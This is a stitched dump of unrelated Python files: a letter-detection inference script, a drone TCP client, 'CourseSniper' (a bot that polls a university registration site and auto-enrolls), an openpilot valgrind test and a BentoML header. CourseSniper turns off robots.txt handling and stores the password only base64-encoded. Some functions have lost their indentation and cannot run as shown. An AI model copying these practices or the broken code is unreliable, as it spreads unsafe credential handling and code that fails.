        [math.floor(y0), math.floor(x0), math.ceil(y1), math.ceil(x1)]
        for y0, x0, y1, x1 in bboxes[0]
    ]
    snapped = np.array(snapped, 'f')
    unrotated = moldingrotation(rad, center, snapped)
    return unrotated, labels[0], scores[0]
# Inference for a single image file, with on-screen visualisation.
def take_image(img_path):
    """Load ``img_path``, detect letters with SSD512, plot and return results."""
    img = read_image(img_path)
    # The label set is the 26 uppercase letters A-Z.
    majomoji_label = ("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M",
                      "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z")
    model = SSD512(n_fg_class=len(majomoji_label))
    serializers.load_npz(model_name, model)
    bboxes, labels, scores = run(img, model)
    vis_bbox(img, bboxes, labels, scores,
             label_names=majomoji_label)
    plt.show()
    return bboxes, labels, scores
# Pseudo-main: batch inference over a folder of images.
def start_inference():
    """Run ``take_image`` on every file under majomoji/inference/Image and
    dump each image's boxes/labels/scores to a .txt under ``result_path``.

    Returns 0 on completion (legacy convention).
    """
    # Create today's result folder, e.g. .../result/2020_9_18.
    dt_now = datetime.datetime.now()
    folder_name = result_path + '/{}_{}_{}'.format(dt_now.year, dt_now.month, dt_now.day)
    # exist_ok avoids the check-then-create race of the original
    # os.path.exists + os.mkdir pair.
    os.makedirs(folder_name, exist_ok=True)
    all_img_path = glob.glob("majomoji/inference/Image/*")
    for img_path in all_img_path:
        print('inference ... [', img_path, ']')
        bboxes, labels, scores = take_image(img_path)
        # basename/splitext instead of split('\\'): the original only
        # stripped directories on Windows paths.
        img_name = os.path.splitext(os.path.basename(img_path))[0]
        print(img_name)
        path_and_name = folder_name + '/' + img_name + '.txt'
        with open(path_and_name, mode='w') as f:
            f.write('{}\n'.format(bboxes))
            f.write('{}\n'.format(labels))
            f.write('{}\n'.format(scores))
    return 0
# Draw the proposed regions and their letters onto the image.
def dwar_frame(bboxes,labels,img):
    """Draw each bbox outline and its letter onto ``img``.

    ``img`` is a ChainerCV-style (C, H, W) array; the return value is an
    OpenCV BGR (H, W, C) image with boxes and labels burned in.
    """
    for box in bboxes:
        # One box = 4 coordinates.
        # NOTE(review): boxes elsewhere in this file are [y0, x0, y1, x1];
        # these locals call indices 0/2 "x" but index them as the first
        # image axis, so the drawing stays consistent despite the names.
        x0 = int(box[0])
        x1 = int(box[2])
        y0 = int(box[1])
        y1 = int(box[3])
        # Horizontal edges of the rectangle, per colour channel.
        for x in range(int(x1)-int(x0)):
            for i in range(3):
                img[i][x0+x][y0] = color[i]
                img[i][x0+x][y1] = color[i]
        # Vertical edges.
        for y in range(y1-y0):
            for i in range(3):
                img[i][x0][y0+y] = color[i]
                img[i][x1][y0+y] = color[i]
    # Convert to an OpenCV image so cv.putText can be used.
    img = trans_img_cv2(img)
    majomoji_label=["A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"]
    for i in range(len(labels)):
        # Write the letter near the box corner (x, y) = (bbox[1], bbox[2]).
        cv.putText(img, majomoji_label[labels[i]],
                   (bboxes[i][1], bboxes[i][2]),
                   cv.FONT_HERSHEY_PLAIN, 5, color, 5, cv.LINE_AA)
    return img
def trans_img_cv2(img):
    """Convert a (C, H, W) RGB array into an OpenCV BGR (H, W, C) image."""
    hwc = np.asanyarray(img, dtype=np.uint8).transpose(1, 2, 0)
    return cv2.cvtColor(hwc, cv2.COLOR_RGB2BGR)
def discord_inf(png):
    """Detect letters in ``png`` and save the annotated image as fin_inf.jpg."""
    img = read_image(png)
    # Label set: the 26 uppercase letters.
    majomoji_label = ("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M",
                      "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z")
    model = SSD512(n_fg_class=len(majomoji_label))
    serializers.load_npz(model_name, model)
    bboxes, labels, scores = run(img, model)
    print("推論終了")
    # Burn boxes/letters into the (C, H, W) image and write it for Discord.
    annotated = dwar_frame(bboxes, labels, img)
    cv2.imwrite("fin_inf.jpg", annotated)
# PIL image -> OpenCV image.
def pil2cv(image):
    """Convert a PIL image (grayscale / RGB / RGBA) to an OpenCV ndarray.

    Grayscale passes through, RGB becomes BGR, RGBA becomes BGRA.
    """
    new_image = np.array(image, dtype=np.uint8)
    if new_image.ndim == 2:  # grayscale
        pass
    elif new_image.shape[2] == 3:  # colour
        new_image = cv2.cvtColor(new_image, cv2.COLOR_RGB2BGR)
    elif new_image.shape[2] == 4:  # with alpha
        # Bug fix: the 4-channel branch used COLOR_RGB2BGR, which does not
        # handle the alpha channel; RGBA2BGRA keeps it intact.
        new_image = cv2.cvtColor(new_image, cv2.COLOR_RGBA2BGRA)
    return new_image
# OpenCV image -> PIL image.
def cv2pil(image):
    """Convert an OpenCV ndarray (grayscale / BGR / BGRA) to a PIL image."""
    new_image = image.copy()
    if new_image.ndim == 2:  # grayscale
        pass
    elif new_image.shape[2] == 3:  # colour
        new_image = cv2.cvtColor(new_image, cv2.COLOR_BGR2RGB)
    elif new_image.shape[2] == 4:  # with alpha
        # Bug fix: BGR2RGB on 4 channels ignores alpha; use BGRA2RGBA.
        new_image = cv2.cvtColor(new_image, cv2.COLOR_BGRA2RGBA)
    new_image = Image.fromarray(new_image)
    return new_image
# PIL image -> ChainerCV image.
def pilccv(pilimg):
    """Convert a PIL image to ChainerCV layout: float32, (C, H, W)."""
    hwc = np.asarray(pilimg, dtype=np.float32)
    # (H, W, C) -> (C, H, W)
    return hwc.transpose((2, 0, 1))
def molrot(_rad,cy,cx,y,x):
rad = math.atan2(y-cy,x-cx)
distance = math.sqrt((x-cx)*(x-cx)+(y-cy)*(y-cy))
# 移動後の座標を出して返す
_y = math.ceil(math.sin(rad+_rad) * distance + cy)
_x = math.ceil(math.cos(rad+_rad) * distance + cx)
return _y,_x
# Undo the rotation that was applied before inference.
def moldingrotation(_radian, center, bboxes):
    """Rotate every bbox by ``_radian`` about ``center`` and re-axis-align.

    Each input [y0, x0, y1, x1] has its four corners rotated; the output box
    is the minimal axis-aligned rectangle containing all four.
    """
    cy, cx = center[0], center[1]
    new_bboxes = []
    for y0, x0, y1, x1 in bboxes:
        corners = [
            molrot(_radian, cy, cx, y0, x0),
            molrot(_radian, cy, cx, y0, x1),
            molrot(_radian, cy, cx, y1, x0),
            molrot(_radian, cy, cx, y1, x1),
        ]
        ys = [c[0] for c in corners]
        xs = [c[1] for c in corners]
        new_bboxes.append([min(ys), min(xs), max(ys), max(xs)])
    return new_bboxes
# IoU-based overlap test used by NMS.
def IoU(area1, area2, score=0.2):
    """Return True when both boxes should be KEPT as distinct detections.

    True  -> disjoint, or overlapping with IoU <= ``score``.
    False -> treated as the same object (IoU above the threshold).
    Boxes are [y0, x0, y1, x1] and may list their corners in either order.
    """
    ay0, ax0, ay1, ax1 = area1
    by0, bx0, by1, bx1 = area2
    a_ylo, a_yhi = min(ay0, ay1), max(ay0, ay1)
    a_xlo, a_xhi = min(ax0, ax1), max(ax0, ax1)
    b_ylo, b_yhi = min(by0, by1), max(by0, by1)
    b_xlo, b_xhi = min(bx0, bx1), max(bx0, bx1)
    # Overlap requires, on each axis, that one box contains a corner of the other.
    y_overlap = (a_ylo <= by0 <= a_yhi) or (a_ylo <= by1 <= a_yhi) or \
                (b_ylo <= ay0 <= b_yhi) or (b_ylo <= ay1 <= b_yhi)
    x_overlap = (a_xlo <= bx0 <= a_xhi) or (a_xlo <= bx1 <= a_xhi) or \
                (b_xlo <= ax0 <= b_xhi) or (b_xlo <= ax1 <= b_xhi)
    if not (y_overlap and x_overlap):
        return True
    intersection = (min(a_xhi, b_xhi) - max(a_xlo, b_xlo)) * (min(a_yhi, b_yhi) - max(a_ylo, b_ylo))
    union = (a_xhi - a_xlo) * (a_yhi - a_ylo) + (b_xhi - b_xlo) * (b_yhi - b_ylo) - intersection
    return (intersection / union) <= score
# Duplicate suppression.
def NMS(informations):
    """Greedy non-maximum suppression over [score, bbox, label] entries.

    Entries are taken in list order: the head is kept, and any later entry
    whose box overlaps a kept box (``IoU`` says "same object") is dropped.
    Returns (kept_bboxes, kept_labels).
    """
    kept_bboxes, kept_labels = [], []
    pending = deque(informations)
    while len(pending) > 0:
        score, bbox, label = pending.popleft()
        kept_bboxes.append(bbox)
        kept_labels.append(label)
        survivors = deque()
        while len(pending) > 0:
            candidate = pending.popleft()
            # IoU(...) is True for distinct objects -> candidate survives.
            if IoU(bbox, candidate[1]):
                survivors.append(candidate)
        pending = survivors
    return kept_bboxes, kept_labels
def highclassinference(png):
    """Detect letters by inferring on 18 rotations of ``png`` (20° apart).

    Each rotation runs in its own process; boxes are mapped back into the
    unrotated frame, merged with NMS so the highest-confidence box of each
    overlapping cluster survives, drawn, and saved as fin_inf.jpg.
    """
    # Build a sqrt(2)-sized white canvas so no rotation clips the image.
    default_image = Image.open(png)
    w, h = default_image.size
    xy = math.ceil(w * math.sqrt(2))
    img = np.zeros((xy, xy, 3), np.uint8)
    img[:, :, 0:3] = [255, 255, 255]
    img = pil2cv(img)
    def_img = pil2cv(default_image)
    _xy = (xy - w) // 2
    img[_xy:_xy + h, _xy:_xy + w] = def_img
    img = cv2pil(img)
    # Rotation centre used to map boxes back afterwards.
    center = [xy / 2, xy / 2]
    majomoji_label = ("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M",
                      "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z")
    model = SSD512(n_fg_class=len(majomoji_label))
    serializers.load_npz(model_name, model)
    informations = []
    runtime = time.time()
    jobs = []
    pipe_list = []
    # Fan out one worker process per 20-degree rotation.
    for i in range(18):
        get_rev, send_rev = multiprocessing.Pipe(False)
        deg = i * 20
        rad = math.radians(deg)
        rot = pilccv(img.rotate(deg, fillcolor=(255, 255, 255)))
        p = multiprocessing.Process(target=multi_run, args=(rot, model, send_rev, rad, center))
        jobs.append(p)
        pipe_list.append(get_rev)
        p.start()
    # Collect results (join first, then drain the pipes, as before).
    for proc in jobs:
        proc.join()
    result_list = [x.recv() for x in pipe_list]
    for bboxes_r, labels_r, scores_r in result_list:
        for k in range(len(bboxes_r)):
            informations.append([scores_r[k], bboxes_r[k], labels_r[k]])
    d_runtime = time.time() - runtime
    print("run : ", d_runtime, " sec")
    nmstime = time.time()
    # Bug fix: sort DESCENDING by score.  The previous ascending sort made
    # greedy NMS keep the LOWEST-confidence box of each cluster, the
    # opposite of the stated goal.
    informations.sort(key=lambda x: x[0], reverse=True)
    bboxes, labels = NMS(informations)
    d_nmstime = time.time() - nmstime
    print("nms : ", d_nmstime, " sec")
    img = pilccv(img)
    img = dwar_frame(bboxes, labels, img)
    # Output for Discord.
    cv2.imwrite("fin_inf.jpg", img)
    print("finish")
def futures_inf(png):
    """Same 18-rotation detection as ``highclassinference`` but using a
    concurrent.futures ProcessPoolExecutor instead of raw Process/Pipe."""
    # Build a sqrt(2)-sized white canvas so no rotation clips the image.
    default_image = Image.open(png)
    w, h = default_image.size
    xy = math.ceil(w * math.sqrt(2))
    img = np.zeros((xy, xy, 3), np.uint8)
    img[:, :, 0:3] = [255, 255, 255]
    img = pil2cv(img)
    def_img = pil2cv(default_image)
    _xy = (xy - w) // 2
    img[_xy:_xy + h, _xy:_xy + w] = def_img
    img = cv2pil(img)
    center = [xy / 2, xy / 2]
    majomoji_label = ("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M",
                      "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z")
    model = SSD512(n_fg_class=len(majomoji_label))
    serializers.load_npz(model_name, model)
    informations = []
    runtime = time.time()
    # Prepare the 18 rotated inputs.
    rot_img = []
    for i in range(18):
        deg = i * 20
        rad = math.radians(deg)
        rot = pilccv(img.rotate(deg, fillcolor=(255, 255, 255)))
        rot_img.append([rot, rad])
    # Parallel inference; as_completed() already blocks until each future is
    # done, so the redundant confu.wait() call was dropped.
    with confu.ProcessPoolExecutor(max_workers=os.cpu_count()) as executor:
        futures = [executor.submit(multi_run2, x[0], model, x[1], center) for x in rot_img]
        for future in confu.as_completed(futures):
            bboxes, labels, scores = future.result()
            for k in range(len(bboxes)):
                informations.append([scores[k], bboxes[k], labels[k]])
    d_runtime = time.time() - runtime
    print("run : ", d_runtime, " sec")
    nmstime = time.time()
    # Bug fix: sort DESCENDING so NMS keeps the highest-confidence box of
    # each overlapping cluster (ascending order kept the lowest).
    informations.sort(key=lambda x: x[0], reverse=True)
    bboxes, labels = NMS(informations)
    d_nmstime = time.time() - nmstime
    print("nms : ", d_nmstime, " sec")
    img = pilccv(img)
    img = dwar_frame(bboxes, labels, img)
    # Output for Discord.
    cv2.imwrite("fin_inf.jpg", img)
    print("finish")
def test():
    """CPU burn-in: count to 30 million (used to benchmark ``main``'s timer)."""
    counter = 0
    iterations = 10000000 * 3
    for _ in range(iterations):
        counter += 1
def main():
    """Entry point: time a full ``futures_inf`` run on a sample image."""
    start = time.time()
    # test()
    futures_inf("84.PNG")
    d_time = time.time() - start
    print("total : ", d_time, " sec")
    # start_inference()
    # Select the image to run inference on:
    # img = read_image('majomoji/Image/test016.PNG')
    # Hand over the trained model:
    # majomoji_label="A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"
    # model = SSD512(n_fg_class=len(majomoji_label))
    # Load the checkpoint:
    # serializers.load_npz('model/2020_3_30_con.npz',model)
    # serializers.load_npz('model/2020_5_27.npz',model)
    # Run inference:
    # bboxes, labels, scores = run(img,model)
    # vis_bbox(img, bboxes, labels, scores,
    #          label_names=majomoji_label)
    # plt.show()
if __name__ == '__main__':
    main()
TCPSender.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = "Jonathan Cheseaux"
__copyright__ = "Copyright 2014"
__credits__ = ["Jonathan Cheseaux", "Stefano Rosati", "Karol Kruzelecki"]
__license__ = "MIT"
__email__ = "cheseauxjonathan@gmail.com"
import socket
import time
from threading import Thread
import threading
class TCPSender(Thread):
    """This class implements a TCP connection between
    the plane and the base station.

    Python 2 code.  Starting the thread connects to the base station,
    begins a KEEPALIVE timer, and flushes any messages buffered while the
    link was down.
    """
    def __init__(self, ip='192.168.100.92', port=8080):
        Thread.__init__(self)
        # Messages queued while disconnected, flushed on (re)connect.
        self.message_buffer = []
        self.ip = ip
        self.port = port
        self.connected = False
        # True while a reconnect loop is already running (avoids spawning
        # a second one from send()).
        self.reconnecting = False
        self.s = None
    def run(self):
        self.connected = False
        self.connect()
    def connect(self):
        """Connects to the server (base station) """
        print "Connecting to server..."
        # Retry every 5 seconds until the TCP connection is established.
        while not self.connected:
            try:
                self.reconnecting = True
                self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                self.s.connect((self.ip, self.port))
                self.connected = True
                self.reconnecting = False
                print "Connection established"
                # Starts the periodic KEEPALIVE timer chain.
                self.send_keepalive()
                # Flush everything queued while the link was down.
                while not len(self.message_buffer) == 0:
                    #the message will be buffered if a disconnection happens again
                    #so we can safely remove the message from the buffer from now
                    msg = self.message_buffer.pop()
                    print "Sending buffered message (remaining : %d" % len(self.message_buffer)
                    self.send(msg)
            except socket.error, err:
                print "Trying to connect again in 5 seconds"
                time.sleep(5)
                self.s.close()
                self.connected = False
                self.reconnecting = True
    def send_keepalive(self):
        """KEEPALIVE message are required in order to detect quickly
        a disconnection between the plane and the base station.
        False positive can arise from this system, and the tolerance
        (time between successive KEEPALIVE message) need to be
        adjusted on both the server (server/ThreadedServer.py) and
        the following timer (setted to 3 by default)
        """
        self.send("KEEPALIVE")
        # Re-arms itself: one KEEPALIVE every 3 seconds on a fresh Timer thread.
        threading.Timer(3, self.send_keepalive).start()
    def receive(self):
        """ Reads the socket's inputstream for received message"""
        if not self.connected:
            return None
        data = self.s.recv(1024)
        if data:
            # NOTE(review): ``instructions`` is computed but never used.
            instructions = data.split("\n")
            # Only [routing] messages are parsed; everything else yields None.
            if data.lower().startswith("[routing]"):
                (header, lat,lon,radius) = data.split("\t")
                return (header, lat, lon, radius)
        return None
    def send(self, message, retry=False):
        """
        Send a message to the socket's outputstream
        If the connection drop, the plane can buffer
        the messages and resend them once the connection
        is up again.
        """
        try:
            if not self.connected and retry:
                self.message_buffer.append(message)
                print "Server not connected yet. Buffering %s [total : %d]" % (message, len(self.message_buffer))
            else:
                self.s.send(message + "\n")
        except socket.error, err:
            # Socket died mid-send: optionally buffer, then kick off a
            # single background reconnect if one isn't already running.
            if retry:
                self.message_buffer.append(message)
                print "Server not connected. Buffering message [total : %d]" % len(self.message_buffer)
            if not self.reconnecting:
                print "Process reconnection..."
                self.connected = False
                Thread(target=self.connect, args = ()).start()
if __name__=='__main__':
    # Bug fix: the original called TCPSender().send() — send() requires a
    # ``message`` argument, so that line always raised TypeError.  Start the
    # client thread instead, which connects and begins the keepalive loop.
    TCPSender().start()
|
CourseSniper.py | import sys, time, mechanize, getpass, multiprocessing, os, urllib2, base64
# Program name - CourseSniper.py
# Written by - Mohammed Madhi Davoodi (mdavoodi@vt.edu)
# Date and version No: 24/04/2012 Ver 1.2
# CourseSniper is a script written using mechanize which automates the process of
# checking for and adding classes in HokieSpa. The user specifies a CRN and CourseSniper
# will check and see if the class is open. If the class is open it will add the class(
# Make sure you have ran Setup first to setup your login credential's!).
# Features:
# - Adding classes by CRN.
# - CourseSniper supports checking for multiple classes at once using multiprocessing.
# - Will show current processes running in the jobs list.
# - Logs the results of all operations in Logs.
# Clear the terminal (has no effect inside IDE consoles such as Eclipse).
def cls():
    """Clear the console using the platform-appropriate shell command."""
    command = 'cls' if os.name == 'nt' else 'clear'
    os.system(command)
# Prints all the current tasks running.
def jobs():
    # active_children() also joins/reaps processes that already finished.
    tasks = multiprocessing.active_children()
    if len(tasks) == 0:
        print "No jobs currently running"
    else:
        for line in tasks:
            print line
    raw_input("Press ENTER to continue...")
def dropAdd(crnToDrop, crnToAdd):
    """Log into HokieSpa and swap ``crnToDrop`` for ``crnToAdd`` in one
    Drop/Add form submission.  Returns True on success, False otherwise."""
    global messages # Give us access to messages which stores the log.
    # Start browser.
    br = mechanize.Browser();
    # Allow access to site even if robots are disabled(may be unethical).
    br.set_handle_robots(False)
    br.set_handle_equiv(False)
    # Allow redirects.
    br.set_handle_redirect(True)
    # Attempt to got to login page.
    try:
        br.open("https://banweb.banner.vt.edu/ssb/prod/twbkwbis.P_WWWLogin")
        br.follow_link(text="Login to HokieSpa >>>", nr = 0)
        br.select_form(nr = 0)
        br["username"] = username;
        # Decode the password.
        br["password"] = base64.standard_b64decode(password);
        # Submit the page(login).
        br.submit()
        # Open the registration page.
        br.open("https://banweb.banner.vt.edu/ssb/prod/hzskstat.P_DispRegStatPage");
    # If the login failed this code wont work.
    except:
        # NOTE(review): bare except + recursive retry — after the recursive
        # call returns, execution FALLS THROUGH below with the failed
        # browser session, and repeated failures recurse without bound.
        messages.append("Login failed.")
        dropAdd(crnToDrop, crnToAdd)
    # Look for the link called Drop/Add. Pick the 5th one(VT's sites are designed badly. No unique ID).
    br.follow_link(text="Drop/Add", nr = 0)
    br.select_form(nr = 1)
    index = 0;
    found = False
    # Locate the form control holding the CRN we want to drop.
    for control in br.controls:
        if (control.value == crnToDrop):
            found = True
            break
        else:
            index = index + 1
    if (found == True):
        # The action selector sits two controls before the CRN control.
        control = br.find_control(nr = index - 2)
        control.readonly = False
        control.value = ["DW"]
        # Select control for adding class.
        control = br.find_control(id = "crn_id1")
        # Enable editing in the box.
        control.readonly = False;
        # Set the value of the box.
        control._value = crnToAdd
        response = br.submit()
        string = response.get_data()
        if "Registration Errors" in string:
            return False
        else:
            return True
    else:
        return False
def ReplaceClass(crnToDrop, crnToAdd):
    """Wait for ``crnToAdd`` to open, then swap it in for ``crnToDrop``.

    If the swap fails, attempts to re-add the dropped class and logs the
    outcome of both attempts to the shared ``messages`` list.
    """
    global messages
    # Blocks until the target class has an open seat.
    campCRN(crnToAdd)
    if dropAdd(crnToDrop, crnToAdd):
        messages.append("Class substitute of " + crnToDrop + " for " + crnToAdd + " succeeded!")
    elif addClass(crnToDrop):
        messages.append("Failed to substitute class " + crnToDrop + " for " + crnToAdd + " readd succeeded!")
    else:
        messages.append("Failed to substitute class " + crnToDrop + " for " + crnToAdd + " readd failed...")
# Adds the class specified by the crn field.
# @param crn: The crn of the class to add.
# @return: True if the class was added. False if there was an error.
def addClass(crn):
    global messages # Give us access to messages which stores the log.
    # Start browser.
    br = mechanize.Browser();
    # Allow access to site even if robots are disabled(may be unethical).
    br.set_handle_robots(False)
    br.set_handle_equiv(False)
    # Allow redirects.
    br.set_handle_redirect(True)
    # Attempt to got to login page.
    try:
        br.open("https://banweb.banner.vt.edu/ssb/prod/twbkwbis.P_WWWLogin")
        br.follow_link(text="Login to HokieSpa >>>", nr = 0)
        br.select_form(nr = 0)
        br["username"] = username;
        # Decode the password.
        br["password"] = base64.standard_b64decode(password);
        # Submit the page(login).
        br.submit()
        # Open the registration page.
        br.open("https://banweb.banner.vt.edu/ssb/prod/hzskstat.P_DispRegStatPage");
    # If the login failed this code wont work.
    except:
        # NOTE(review): bare except + recursion — after the recursive call
        # returns, execution continues below with the broken session, and
        # persistent failures recurse without bound.
        messages.append("Login failed.")
        addClass(crn)
    try:
        # Look for the link called Drop/Add. Pick the Nth one(VT's sites are designed badly. No unique ID).
        br.follow_link(text="Drop/Add", nr = 0)
        br.select_form(nr = 1)
        control = br.find_control(id = "crn_id1")
        # Enable editing in the box.
        control.readonly = False;
        # Set the value of the box.
        control._value = crn
        response = br.submit()
        string = response.get_data()
        if "Registration Errors" in string:
            return False
        else:
            return True
    except:
        # NOTE(review): the retry's result is discarded; this path always
        # reports False even when the recursive attempt succeeded.
        addClass(crn)
        return False
# Stop every child process and quit.
def terminate():
    """Kill all still-running worker processes, then exit the program."""
    for proc in processes:
        if proc.is_alive():
            proc.terminate()
    sys.exit()
def addClassByCRN(crn, messages):
    """Block until ``crn`` has an open seat, then try to register for it.

    The outcome is appended to the shared ``messages`` log list.
    """
    # Camp on the timetable until the section opens.
    campCRN(crn)
    if addClass(crn):
        messages.extend([crn + " successfully added."])
    else:
        messages.extend([crn + " failed to add."])
# Checks to see if the specified crn is open.
# @param crn: The crn of the course we are checking to see is open
# @param messages: the log file for the call.
def campCRN(crn):
    global messages
    br = mechanize.Browser();
    br.set_handle_robots(False);
    br.set_handle_equiv(False)
    # Load the Timetable.
    try:
        br.open("https://banweb.banner.vt.edu/ssb/prod/HZSKVTSC.P_ProcRequest");
    except:
        # NOTE(review): on failure this recurses, and when the recursive
        # call returns, execution continues below with the un-opened page.
        campCRN(crn)
    found = False
    # Loop until the class is open.  Polls the timetable every 30 seconds.
    while(found != True):
        try:
            br.select_form(nr = 0);
            br["open_only"] = ["on"]
            br["TERMYEAR"] = ["201401"]
            br["crn"] = crn;
            string = ""
            # Try except to be used to try and catch all HTTP errors.
            response = br.submit()
            string = response.get_data()
        except urllib2.HTTPError, e:
            messages.extend([crn + " got HTTP " +str(e.code) + " error."])
            continue
        if "NO SECTIONS FOUND FOR THIS INQUIRY." in string:
            found = False
            time.sleep(30)
        else:
            found = True
# Sets up the account used to add classes.
def setup():
    global username
    username = raw_input("Enter your PID: ")
    global password
    # Base64 is obfuscation, not encryption: the password is trivially
    # recoverable from memory.
    password = base64.standard_b64encode(getpass.getpass("Enter your password: "))
    confirm = base64.standard_b64encode(getpass.getpass("Confirm your password: "))
    if(password == confirm):
        print 'Setup Successful'
    else:
        # Mismatch: start over (recursive retry).
        print "Password did not match."
        setup()
    raw_input("Press ENTER to continue...")
# Prints the log.
def log():
    global messages
    # ``messages`` is a Manager().list(), shared with the worker processes.
    if len(messages) == 0:
        print "Nothing Added yet"
    else:
        for line in messages:
            print line
    raw_input("Press ENTER to continue...")
# Brings up the main screen.
def main():
    """Interactive menu loop.

    Note: the menu "loops" by tail-recursing into main(); a very long
    session could eventually hit Python's recursion limit.
    """
    global messages, processes
    print "Welcome to CourseSniper 1.2"
    print "What would you like to do?"
    print "1. Add class by CRN"
    print "2. Replace Class by CRN"
    print "3. Log"
    print "4. Jobs"
    print "5. Setup"
    print "6. Exit"
    var = raw_input("Input the command you want to do's number: ")
    if (var == "1"):
        # Spawn a background sniper process for a single CRN.
        cls()
        CRN = raw_input("Enter the CRN of the class you want to add: ")
        service = multiprocessing.Process(name='addClassByCRN_' + CRN, target=addClassByCRN, args=(CRN, messages))
        service.start()
        processes.append(service)
        print "CRN added to jobs list."
        raw_input("Press ENTER to continue...")
        cls()
        main()
    elif (var == "2"):
        # Spawn a background drop-and-replace process.
        cls()
        crnToDrop = raw_input("Enter the CRN of the class you want to drop: ")
        crnToAdd = raw_input("Enter the CRN of the class you want to add: ")
        service = multiprocessing.Process(name='ReplaceClassByCRN_' + crnToDrop + '_with_' + crnToAdd ,
                                          target=ReplaceClass, args=(crnToDrop, crnToAdd))
        service.start()
        processes.append(service)
        print "Replace added to jobs list."
        raw_input("Press ENTER to continue...")
        cls()
        main()
    elif (var == '3'):
        cls()
        log()
        cls()
        main()
    elif (var == '4') :
        cls()
        jobs()
        cls()
        main()
    elif (var == "5"):
        cls()
        setup()
        cls()
        main()
    elif (var == "6"):
        terminate()
    else:
        print 'Invalid Input.'
        time.sleep(1)
        cls()
        main()
if __name__ == '__main__':
    # List of all processes ever started (used by jobs() and terminate()).
    processes = []
    # Manager providing state shared across the worker processes.
    manager = multiprocessing.Manager()
    # Default username (set interactively via option 5 / setup()).
    username = ''
    # Default password (base64-obfuscated by setup()).
    password = ''
    # Manager-backed list so every worker process can append log messages.
    messages = manager.list()
    main()
|
test_valgrind_replay.py | import os
import threading
import time
import unittest
import subprocess
import signal
if "CI" in os.environ:
def tqdm(x):
return x
else:
from tqdm import tqdm # type: ignore
import cereal.messaging as messaging
from collections import namedtuple
from tools.lib.logreader import LogReader
from selfdrive.test.process_replay.test_processes import get_segment
from common.basedir import BASEDIR
# Description of one process under test: its executable, message routing
# (published log topics -> expected response topics) and the drive segment
# whose logs get replayed into it.
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'command', 'path', 'segment', 'wait_for_response'])
CONFIGS = [
  ProcessConfig(
    proc_name="ubloxd",
    pub_sub={
      # Replay ubloxRaw from the log; expect these responses back.
      "ubloxRaw": ["ubloxGnss", "gpsLocationExternal"],
    },
    ignore=[],
    command="./ubloxd",
    path="selfdrive/locationd/",
    segment="0375fdf7b1ce594d|2019-06-13--08-32-25--3",
    wait_for_response=True
  ),
]
class TestValgrind(unittest.TestCase):
def extract_leak_sizes(self, log):
log = log.replace(",","") # fixes casting to int issue with large leaks
err_lost1 = log.split("definitely lost: ")[1]
err_lost2 = log.split("indirectly lost: ")[1]
err_lost3 = log.split("possibly lost: ")[1]
definitely_lost = int(err_lost1.split(" ")[0])
indirectly_lost = int(err_lost2.split(" ")[0])
possibly_lost = int(err_lost3.split(" ")[0])
return (definitely_lost, indirectly_lost, possibly_lost)
def valgrindlauncher(self, arg, cwd):
os.chdir(os.path.join(BASEDIR, cwd))
# Run valgrind on a process
command = "valgrind --leak-check=full " + arg
p = subprocess.Popen(command, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid) # pylint: disable=W1509
while not self.done:
time.sleep(0.1)
os.killpg(os.getpgid(p.pid), signal.SIGINT)
_, err = p.communicate()
error_msg = str(err, encoding='utf-8')
with open(os.path.join(BASEDIR, "selfdrive/test/valgrind_logs.txt"), "a") as f:
f.write(error_msg)
f.write(5 * "\n")
definitely_lost, indirectly_lost, possibly_lost = self.extract_leak_sizes(error_msg)
if max(definitely_lost, indirectly_lost, possibly_lost) > 0:
self.leak = True
print("LEAKS from", arg, "\nDefinitely lost:", definitely_lost, "\nIndirectly lost", indirectly_lost, "\nPossibly lost", possibly_lost)
else:
self.leak = False
def replay_process(self, config, logreader):
pub_sockets = [s for s in config.pub_sub.keys()] # We dump data from logs here
sub_sockets = [s for _, sub in config.pub_sub.items() for s in sub] # We get responses here
pm = messaging.PubMaster(pub_sockets)
sm = messaging.SubMaster(sub_sockets)
print("Sorting logs")
all_msgs = sorted(logreader, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(config.pub_sub.keys())]
thread = threading.Thread(target=self.valgrindlauncher, args=(config.command, config.path))
thread.daemon = True
thread.start()
time.sleep(5) # We give the process time to start
for msg in tqdm(pub_msgs):
pm.send(msg.which(), msg.as_builder())
if config.wait_for_response:
sm.update(100)
self.done = True
def test_config(self):
    """Replay every configured segment and leak-check its process.

    Truncates the shared valgrind log file first, then replays each
    CONFIGS entry through ``replay_process``.
    """
    # Use a context manager to truncate the log file: the original called
    # open(...) bare, leaking the file handle.
    with open(os.path.join(BASEDIR, "selfdrive/test/valgrind_logs.txt"), "w"):
        pass
    for cfg in CONFIGS:
        self.done = False
        URL = cfg.segment
        lr = LogReader(get_segment(URL))
        self.replay_process(cfg, lr)
        time.sleep(1)  # Wait for the logs to get written
if __name__ == "__main__":
    # Entry point: run the leak-check test cases via unittest's CLI runner.
    unittest.main()
|
marshal.py | # Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import logging
import multiprocessing
import time
import traceback
from functools import partial
import aiohttp
import psutil
from bentoml import config
from bentoml.exceptions import RemoteException
from bentoml.marshal.dispatcher import CorkDispatcher, NonBlockSema
